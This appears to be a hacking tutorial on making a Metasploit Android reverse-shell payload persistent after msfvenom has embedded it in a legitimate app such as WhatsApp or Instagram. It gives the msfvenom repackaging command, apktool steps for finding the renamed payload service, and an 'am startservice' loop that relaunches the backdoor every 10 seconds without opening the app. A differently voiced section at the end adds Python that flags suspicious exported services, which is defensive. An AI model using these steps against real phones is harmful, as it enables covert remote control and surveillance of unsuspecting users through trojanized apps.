A persistent backdoor script (script.sh) for the non-embedded android/meterpreter/reverse_tcp apk payload was created and run in this post.
The problem with that script is that it cannot be used on a payload that has been embedded in an original apk file (like WhatsApp or Instagram) with: msfvenom -x original.apk -p android/meterpreter/reverse_tcp lhost=your_local_ip lport=1234 -o original_embedded.apk
In this post I will explain how to create a persistent backdoor script for that case.
A video explaining the same is uploaded on YouTube along with a link to a small piece of software I created that automates the whole script generation process. I made this software because I was getting tired of creating the scripts manually again and again: the script is slightly different each time the payload is created, and it is not always the same as the do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity used for the default payload.
After downloading script.py from the link, run it in the terminal as: python script.py
Add the correct paths for apktool.jar and the generated embedded_original.apk, then click Generate Script.
That's it. It may take some time depending on the size of the apk file. The script will be saved as script.sh in the same folder where script.py is located.
Run the script in meterpreter as shown in this post.
Please note: if you generate script.sh on Windows instead of Kali, create a new script.sh file in Kali and copy and paste the script code into the newly created file. What I experienced was that any script file created on Windows did not work in Kali msfconsole with exploit/multi/handler. In any case, if you are already using Kali, it is recommended to run this script generator software on Kali too to avoid confusion.
To do it manually, follow method 2 below.
The steps to follow after creating embed_original.apk:
Download and install Apktool by following the steps from this link.
Copy both apktool.jar and apktool into the /usr/local/bin folder so they can be used from the terminal.
The command for decompiling the apk is: apktool d -f embed_original.apk
This will create an embed_original folder.
The embed_original folder will contain AndroidManifest.xml; open the file and go to the last part of the manifest.
What we need is the last service entry, which is the reference for the script and looks like: <service android:exported="true" android:name="com.example.myapplication.apdie.Fiels"/>
This path, com.example.myapplication.apdie.Fiels, will be used in the script to run the service. In the non-embedded metasploit apk this path is usually com.metasploit.stage.MainActivity.
But when embed_original.apk is created, the files of the metasploit payload are moved into original.apk under random names, such as "apdie.Fiels" in com.example.myapplication.apdie.Fiels, which is essentially "stage.Payload" from com.metasploit.stage.Payload renamed to avoid conflicts with the original apk's own file names while the application runs.
Use com.example.myapplication.apdie.Fiels in the form com.example.myapplication/.apdie.Fiels in script.sh:
do am startservice --user 0 com.example.myapplication/.apdie.Fiels
This runs the payload in the background at a 10-second interval without opening the main application.
Remember that apdie.Fiels changes every time the payload is created, so you have to repeat all the steps if embed_original.apk is generated again.
Follow the steps here to run the script.
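From the defender's side, the same manifest detail is what gives such a repackaged apk away: an extra exported service, usually appended last, with a randomized class name and no intent-filter. The following added example (not the post's own code, and not the generator software it links to) parses a decompiled AndroidManifest.xml and lists exported services that deserve review; the manifest content is constructed here to mirror the entry shown above.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample of the tail of a decompiled AndroidManifest.xml,
# modelled on the service entry discussed above (not a real app's manifest).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.myapplication">
  <application android:label="MyApp">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService"/>
    <service android:exported="true" android:name="com.example.myapplication.apdie.Fiels"/>
  </application>
</manifest>
"""


def _attr(elem, name, default=None):
    # Android attributes live in the android: namespace.
    return elem.get("{%s}%s" % (ANDROID_NS, name), default)


def find_suspicious_services(manifest_xml: str):
    """Return exported <service> entries that have no intent-filter.

    A legitimate app may export a bound service for other apps, so this is a
    triage list, not a verdict; the service added by a repackaging tool is
    typically exported, filter-less and declared last in the manifest.
    """
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    services = root.findall("./application/service")
    findings = []
    for idx, svc in enumerate(services):
        name = _attr(svc, "name", "")
        # Resolve shorthand names the way Android does (".Foo" -> pkg.Foo).
        if name.startswith("."):
            name = pkg + name
        elif "." not in name:
            name = pkg + "." + name
        exported = _attr(svc, "exported", "false") == "true"
        has_filter = svc.find("intent-filter") is not None
        if exported and not has_filter:
            findings.append({"name": name, "last_in_manifest": idx == len(services) - 1})
    return findings
```

Run it on the manifest extracted with apktool d, then compare each flagged class against the app's known source tree; a class that exists only as smali with a name nothing else in the app references is the one to examine.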